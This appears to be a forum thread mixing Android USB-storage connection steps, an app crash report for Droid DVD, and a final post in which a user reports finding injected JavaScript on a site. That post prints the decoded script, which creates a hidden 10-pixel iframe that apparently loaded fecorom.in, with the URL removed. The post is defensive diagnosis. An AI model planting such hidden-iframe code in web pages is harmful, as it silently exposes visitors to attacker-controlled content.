Quote: Hope that helps!? Did you have to install drivers/software on your computer? If I remember well: Yes, there have been some drivers installed when I initially connected the Samsung to my PC for the first time. In my Device Manager I see (2) "Android UMS Composite USB Device"s when the phone is connected to the PC. And as far as I remember the drivers for the Samsung Galaxy (Note) have been found online by Windows (7) itself, as there are no drivers available from Samsung itself. |

Quote: thanks for all the suggestions guys.
As this is my first Android phone it's all new to me, but hopefully something will just start working.
Android was new to me too, as my Samsung Galaxy Note is the 1st Android phone I ever owned (I was a HTC/Windows Mobile 6.5 user before).
Here's how I (properly) connect my device to the PC as a Harddisk:
1.) Make sure that USB Debugging is OFF (Settings > Applications > Development > USB Debugging NOT checked; 2.)Go to Settings 3.) Tap on "Wireless and Networks" 4.) Tap on "USB-Connection" 5.) Tap on the button "Connect storage to USB 6.) A small window "USB Connection" appears, telling you to connect your USB-Cable in order to use the mass-storage 7.) ONLY NOW (and NOT EARLIER!!!) connect the USB-cable to your device (the USB-Cable should ALREADY be connected to your PC or USB-HUB on the other end!!!); 8.) Now a green Android window appears with a button at the bottom "Connect USB Storage" 9.) Tap on that button 10.) a new smaller window appears "Connect USB-storage" with another button "OK" 11.) Tap on the "OK"-button 12.) wait a little while, until the green Android turns its colour to orange 13.) only now your Android device is properly connected to your PC and you can browse your files and folders on the phone using the Windows Explorer as you would with any harddisk directly connected to your PC.
Hope that helps!? many thanks. That's got it all working. | | | Paul |

many thanks. That's got it all working. Gr8 !!! I am happy to have been able to help! BTW: I just checked under Windows 8 : I just did nothing but connected the phone to the PC under Windows 8. The first thing that happened was installation of drivers, this took just seconds and worked like a charm. Immediately after the drivers were installed, I could see and browse my phone in the Windows Explorer without any further action! So: I am not really a fan of Windows 8 (yet), but this is something that seems to have improved a lot! Cheers, Tom |

Great app, got it installed and working on an HTC Desire BUT when I try to click on a movie this appears:
'Sorry! the application Droid DVDP(process com.ksoft.droid_dvdP) has stopped unexpectedly. Please Try again. Force close.
I can sort and change it to covers. In about the version I have is Beta 0.3
Thanks in advance.

Be sure to have last Android application and the last export plugin. As there are some changes in my database structure, there may be problems (including FC). |

| Posted: | | | | Hi Dr
I thought the new version was on the phone and the plugin was on the PC. Is this right?

| Posted: | | | | Found the problem. There's a block of JavaScript that hides it's payload as a list of Unicode numbers seperated by the letter "n". It's in one line of HTML (longest one) and it creates a hidden iframe which links to fecorom.in
The hidden iframe contains the following HTML which is the decoded unicode characters. I removed the URL it links to.
if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write(""); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','[removed]');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); } | | | Last edited: by Dr. Killpatient |
